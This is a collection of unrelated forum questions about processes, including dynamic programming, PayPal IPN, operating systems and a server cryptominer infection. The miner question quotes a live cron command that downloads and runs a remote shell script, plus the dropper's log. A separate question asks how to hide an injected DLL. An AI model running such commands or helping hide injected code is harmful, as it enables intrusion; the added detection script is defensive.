## 55 Windows host process (Rundll32) instances running [closed]

I’m running Windows 10, and for a while I’ve noticed an excessively high number of Rundll32 instances running in the background. It just seems weird to me that there are 55 of these instances running at once. I’ve run a malware scan, but nothing comes up.

## Thought process to solve tree based Dynamic Programming problems

I am having a very hard time understanding tree based DP problems. I am fairly comfortable with array based DP problems but I cannot come up with the correct thought process for tree based problems and I was hoping somebody could please explain their thought process.

I will talk about my thought process behind array based problems and then explain my troubles with tree based DP problems.

My thought process for array problems

The way I think about DP in array based problems is as follows. Let us consider a problem like Minimum Path Sum. Here the objective is to get from the top left to bottom right positions in a matrix such that we minimize the cost of the path. We can only move left and right.

The way I would approach problems like this is as follows:

• First I would construct a recurrence. In this case the recurrence is as follows

The recurrence is:

```
f(i, j) = a[i][j]                                       // if i == m and j == n
f(i, j) = a[i][j] + f(i, j+1)                           // if i == m
f(i, j) = a[i][j] + f(i+1, j)                           // if j == n
f(i, j) = a[i][j] + Math.min( f(i, j+1), f(i+1, j) )    // Otherwise
```
• Next I look at the last equation `f(i, j) = a[i][j] + Math.min( f(i, j+1), f(i+1, j) )` which tells me the problem can be solved using DP as there are overlapping subproblems in `f(i+1, j) and f(i, j+1)`. There is also an optimal substructure.

• I can also tell the time/space complexity just by looking at the recurrence.

• Because we must compute all states which is all (i,j) pairs and because time per state is O(1) (adding a[i][j] to result) the time complexity is O(n^2).
• Looking at the recurrence, i depends only on i+1 and not on i+2, i+3 … similarly j depends only on j+1 and not on j+2, j+3… so we can get away with using only 1 extra row (either i+1 or j+1) instead of the entire matrix so space complexity is O(n).

Hence I would come up with a n^2 time and n space solution. I can do this without any problems.

My thought process for tree problems

However I am having a hard time applying the same thought process to tree based DP problems. As an example let us consider the problem Diameter of Binary Tree where the objective is to find the longest path between any 2 nodes in the tree.

I can come up with a recurrence for this problem which is as follows:

```
f(n) = 0                                          // if n == null
f(n) = max( 1+height(n.left) + height(n.right),   // longest path passing through root
            f(n.left),                            // longest path in left subtree
            f(n.right) )                          // longest path in right subtree
```

Because `f(n.left)` for example is computed by doing `1+height(n.left.left) + height(n.left.right)` I can tell that DP must be used.

So my approach would be to create a cache of size ‘n’ that stores all the heights of the nodes. So the space complexity would be O(n).

However the optimal solution of this problem has a space complexity of O(1) and I am having a hard time figuring that out just by looking at the recurrence. How does the recurrence tell you that space complexity can be reduced and that O(1) space is enough and O(n) is not needed? How do you know what value(s) to store in this case? In array based problems I can get the answers to both these questions just by looking at the recurrence but for tree based dp it is not so obvious to me.

My questions:

1. What can you tell about this problem just by looking at the recurrence for the tree problem? Putting aside my own thought process, if I gave you this recurrence and nothing else what conclusions would you reach and how would you write the program? I am curious about your thought process.

2. For array based problems I can tell just by looking at the recurrence both how much space I needed to solve the problem AND what exactly I needed to store (I need to store values of row i+1 in min path sum and nothing else). How can I do the same for the tree problem?

Thanks.
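The recurrence from the question evaluated two ways, as an added example that is not part of the original post: once literally, and once in a single post-order pass that returns each subtree's height to its parent and keeps only a running maximum. `Node`, `f_naive`, `f_single_pass` and the sample tree are names and data constructed for this illustration.

```python
class Node:
    def __init__(self, left=None, right=None):
        self.left = left
        self.right = right

def height(n):
    """Number of nodes on the longest root-to-leaf path (0 for an empty tree)."""
    return 0 if n is None else 1 + max(height(n.left), height(n.right))

def f_naive(n):
    """The recurrence exactly as posted; height() is recomputed at every node."""
    if n is None:
        return 0
    through = 1 + height(n.left) + height(n.right)
    return max(through, f_naive(n.left), f_naive(n.right))

def f_single_pass(root):
    """Same recurrence in one post-order pass.

    f(n) is the maximum of the 'path through node' term over every node in
    the subtree, and that term needs only the two child heights. Each call
    therefore returns its height to the parent and folds its own term into
    one running maximum: no per-node cache, only the recursion stack.
    """
    best = 0

    def visit(n):
        nonlocal best
        if n is None:
            return 0
        left, right = visit(n.left), visit(n.right)
        best = max(best, 1 + left + right)   # path passing through n
        return 1 + max(left, right)          # height handed to the parent

    visit(root)
    return best

def sample_tree():
    # Constructed input: the longest path (7 nodes) lies entirely inside the
    # left subtree, so the answer is not the term computed at the root (6).
    deep_left = Node(Node(Node()))
    deep_right = Node(None, Node(Node()))
    return Node(Node(deep_left, deep_right), Node())

if __name__ == "__main__":
    print(f_naive(sample_tree()), f_single_pass(sample_tree()))
```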

## Using the fundamental matrix for triangulation process?

Given the projection matrices from two cameras ($$P$$, $$P'$$) and a pair of corresponding points $$\{x_i,x'_i\}$$, it is straightforward to compute the triangulation using $$x_i=PX, x'_i=P'X$$.
I understand that a similar algebraic process can be used to find $$X$$ using only the fundamental matrix $$F$$, as it also contains $$[T]_xR$$, but I could not develop such an equation.
Does someone know the derivation of such a process?

## A bitcoin miner is getting installed on my web server with the apache2 process

For a few weeks, someone, probably a bot, keeps installing a bitcoin miner on my server. I found it because it is taking all the CPU. The process name is kdevtmpfsi, located at /tmp/kdevtmpfsi; there’s a watchdog process, kinsing, located at /var/tmp/kinsing, and a cron job:

```
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
```

I keep removing the traces above, but the attacker keeps re-injecting them, using the same exploit, which must be tied to the apache2 process because here’s what I find in my apache2 error log:

```
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: 2: ulimit: error setting limit (Operation not permitted)
rm: cannot remove '/var/log/syslog': Permission denied
100 27434  100 27434    0     0  4465k      0 --:--:-- --:--:-- --:--:-- 4465k
chattr: Permission denied while setting flags on /tmp/
chattr: Permission denied while setting flags on /var/tmp/
ERROR: You need to be root to run this script
iptables v1.6.1: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
sudo: no tty present and no askpass program specified
sh: 10: cannot create /proc/sys/kernel/nmi_watchdog: Permission denied
sh: 11: cannot create /etc/sysctl.conf: Permission denied
userdel: user 'akay' does not exist
userdel: user 'vfinder' does not exist
chattr: Permission denied while trying to stat /root/.ssh/
chattr: Permission denied while trying to stat /root/.ssh/authorized_keys
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
grep: Trailing backslash
grep: write error: Broken pipe
kill: (56): Operation not permitted
kill: (25879): No such process
kill: (25886): No such process
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
(Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.)
pkill: killing pid 807 failed: Operation not permitted
pkill: killing pid 836 failed: Operation not permitted
pkill: killing pid 836 failed: Operation not permitted
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
sh: 477: docker: not found
sh: 478: docker: not found
sh: 479: docker: not found
sh: 480: docker: not found
sh: 481: docker: not found
sh: 482: docker: not found
sh: 483: docker: not found
sh: 484: docker: not found
sh: 485: docker: not found
sh: 486: docker: not found
sh: 487: docker: not found
sh: 488: docker: not found
sh: 489: docker: not found
sh: 490: docker: not found
sh: 491: docker: not found
sh: 492: docker: not found
sh: 493: docker: not found
sh: 494: docker: not found
sh: 495: docker: not found
sh: 496: docker: not found
sh: 497: docker: not found
sh: 498: docker: not found
sh: 499: setenforce: not found
sh: 500: cannot create /etc/selinux/config: Permission denied
Failed to stop apparmor.service: Interactive authentication required.
See system logs and 'systemctl status apparmor.service' for details.
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Failed to reload daemon: Interactive authentication required.
update-rc.d: error: Permission denied
Failed to stop aliyun.service.service: Interactive authentication required.
See system logs and 'systemctl status aliyun.service.service' for details.
Failed to disable unit: Interactive authentication required.
sh: echo: I/O error
md5sum: /var/tmp/kinsing: No such file or directory
sh: echo: I/O error
sh: echo: I/O error
--2020-01-10 19:03:30--  https://bitbucket.org/kondrongo12/git/raw/master/kinsing
Resolving bitbucket.org (bitbucket.org)... 18.205.93.2, 18.205.93.1, 18.205.93.0, ...
Connecting to bitbucket.org (bitbucket.org)|18.205.93.2|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17072128 (16M) [application/octet-stream]
Saving to: '/var/tmp/kinsing'

     0K .......... .......... .......... .......... ..........  0% 1.54M 11s
    50K .......... .......... .......... .......... ..........  0% 3.62M 7s
   100K .......... .......... .......... .......... ..........  0% 5.97M 6s
   150K .......... .......... .......... .......... ..........  1% 7.92M 5s
 16500K .......... .......... .......... .......... .......... 99% 11.5M 0s
 16550K .......... .......... .......... .......... .......... 99% 9.01M 0s
 16600K .......... .......... .......... .......... .......... 99% 11.3M 0s
 16650K .......... .......... ..                              100% 28.2M=1.5s

2020-01-10 19:03:31 (10.8 MB/s) - '/var/tmp/kinsing' saved [17072128/17072128]

sh: echo: I/O error
sh: echo: I/O error
```

This is in the main apache2 error log file (/var/log/apache2/error.log) and not in my website error log, so I am thinking that it is not related to my PHP code. What should I do/check next?
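A triage check for the two artefacts described above, as an added example that is not part of the original post: it flags crontab entries that pipe a download straight into a shell, and classifies error-log lines that are really the stderr of a shell script spawned under the web server. The function names and rule set are assumptions made for illustration; the sample lines are taken from the question, apart from two constructed benign ones.

```python
import re

# A cron command that fetches a remote script and pipes it into a shell.
FETCH_PIPE_SHELL = re.compile(
    r"\b(?:wget|curl)\b[^|;&]*\|\s*(?:/bin/)?(?:ba|da)?sh\b")

# Script stderr that has no business in a web server's main error log.
# Rule names are this example's own, not a standard taxonomy.
LOG_RULES = [
    ("download_to_tmp",
     re.compile(r"Saving to: '(?:/(?:var/)?tmp/|/dev/shm/)[^']*'")),
    ("shell_error", re.compile(r"\bsh: \d+: ")),
    ("defence_tampering", re.compile(
        r"^(?:chattr|iptables|userdel|setenforce|Failed to stop apparmor)\b")),
    ("log_removal", re.compile(r"rm: cannot remove '/var/log/")),
]

def suspicious_cron_entries(crontab_text):
    """Return crontab lines whose command downloads and pipes into a shell."""
    entries = (line.strip() for line in crontab_text.splitlines())
    return [e for e in entries
            if e and not e.startswith("#") and FETCH_PIPE_SHELL.search(e)]

def classify_error_log(lines):
    """Map rule name -> list of matching log lines."""
    found = {}
    for line in lines:
        text = line.strip()
        for name, rule in LOG_RULES:
            if rule.search(text):
                found.setdefault(name, []).append(text)
    return found

# Sample input: the cron line and four log lines quoted in the question, plus
# a constructed benign cron job and a constructed normal Apache notice.
CRONTAB = """\
# m h dom mon dow command
17 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
"""
ERROR_LOG = [
    "[Fri Jan 10 19:00:01 2020] [mpm_prefork:notice] resuming normal operations",
    "rm: cannot remove '/var/log/syslog': Permission denied",
    "chattr: Permission denied while setting flags on /tmp/",
    "sh: 11: cannot create /etc/sysctl.conf: Permission denied",
    "Saving to: '/var/tmp/kinsing'",
]

if __name__ == "__main__":
    print(suspicious_cron_entries(CRONTAB))
    print(classify_error_log(ERROR_LOG))
```

Any hit from `classify_error_log` in the server-wide error log means a child of the web server process ran a shell script, so the crontab to inspect is the one belonging to the account Apache runs as.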

## How to Receive and Process Paypal IPN on a WordPress Page

I have created a WordPress page template (listener.php) and then created a WP page using that template. The page URL is like: mysite.com/thank-you. Here is the code I have placed in the template (listener.php):

```
<?php
/* Template Name: ipnlistener */

// Post the received IPN message back to PayPal for validation.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://ipnpb.sandbox.paypal.com/cgi-bin/webscr');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Verify PayPal's TLS certificate and host name (the extracted code set both to 0).
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "cmd=_notify-validate&" . http_build_query($_POST));
$response = curl_exec($ch);
curl_close($ch);

echo "The Response From the Server is: " . $response;
```

Now I go to developer.paypal.com and send an IPN using the IPN Simulator, pointing towards this page. After that I refresh/reload the listener page (mysite.com/thank-you), but it always shows the output `The Response From the Server is: INVALID`, while it should be VERIFIED, as a completed transaction IPN is being sent to it. I am not sure what is wrong; I have pointed the IPN towards the right page and the code seems to be correct as well.

## What audit process do the softwares have that manage lethal weapon equipped robots?

I am in IT and I know: ALL the software in the world is horribly insecure. History proves it (of course prove me wrong!).

So, if we are giving, e.g., drones lethal weapons, like bombs, what operating system, what applications, what protocols (to communicate, give orders) are used?

The Q: what audits were done on these elements? Are there any standards?

Did they, e.g., write a fully new OS (with tons of secbugs) or take a hardened OpenBSD (but that is just the OS and still could have secbugs)?

## Does the leader election problem only apply to process replication/redundancy?

The leader election problem is said to be:

> In distributed computing, leader election is the process of designating a single process as the organizer of some task distributed among several computers (nodes). Before the task is begun, all network nodes are either unaware which node will serve as the “leader” (or coordinator) of the task, or unable to communicate with the current coordinator. After a leader election algorithm has been run, however, each node throughout the network recognizes a particular, unique node as the task leader.

As far as the leader’s responsibility is concerned, are the candidates identical?

Does the leader election problem apply only to processes which are replicas, i.e. to process redundancy? In other words, does the leader election problem not apply to processes which are not replicas, i.e. processes without redundancy?

My confusions come from:

• Design Data Intensive Programs by Kleppmann introduces the concept of “leader” in Chapter 5 Replication, while the election problem in Chapter 9: Consistency and Consensus.

• Distributed Systems by Coulouris introduces the concept of “primary replica manager” and “backup replica manager” in Chapter 18 Replication, while the election problem in Chapter 15: Coordination and Agreement.

So I wonder if the election problem applies only to replication (more specifically, process replication), or also to cases which don’t involve replication?

Thanks.

## Journey of a process from compilation to execution

I am reading about operating systems, and after reading some topics (Processes, Main Memory management) I got somewhat confused. I have knowledge about certain things but I am not able to combine and visualize them. Let’s take an example. I have a simple program as follows:

```
#include<bits/stdc++.h>
using namespace std;

int add(int a,int b){
  return a+b;
}

int main(){
  int a=1,b=2;
  int c=add(a,b);
  cout<<c<<endl;
}
```

I want to know how this program will be loaded into the main memory and how the computation will get done.
I have certain points which I want to incorporate in the overall process.

1. At what stage and where will I be getting the 4 sections of memory (Text, Data, Stack and Heap)?
2. At what stage will the process be getting its PCB (Process Control Block)? Does the PCB contain the 4 sections of the process?
3. When and where is the role of CPU?
4. Address binding.
5. Loading
6. Linking.
7. Logical and physical address space.
8. Paging

Please explain how the process will be executed including the above steps and other steps which take place in general.
P.S. Please explain by assuming some memory addresses.

## How can I hide DLL that loaded into the process memory?

I performed “reflective DLL injection”, and I am trying to determine whether I can view the injected DLL. If so, how can I hide it?

## Difference between task and process

I’d like to know what the difference is between a task and a process in computer science. I’m studying a course on real-time systems and there are some definitions that I don’t know.

Thank you in advance.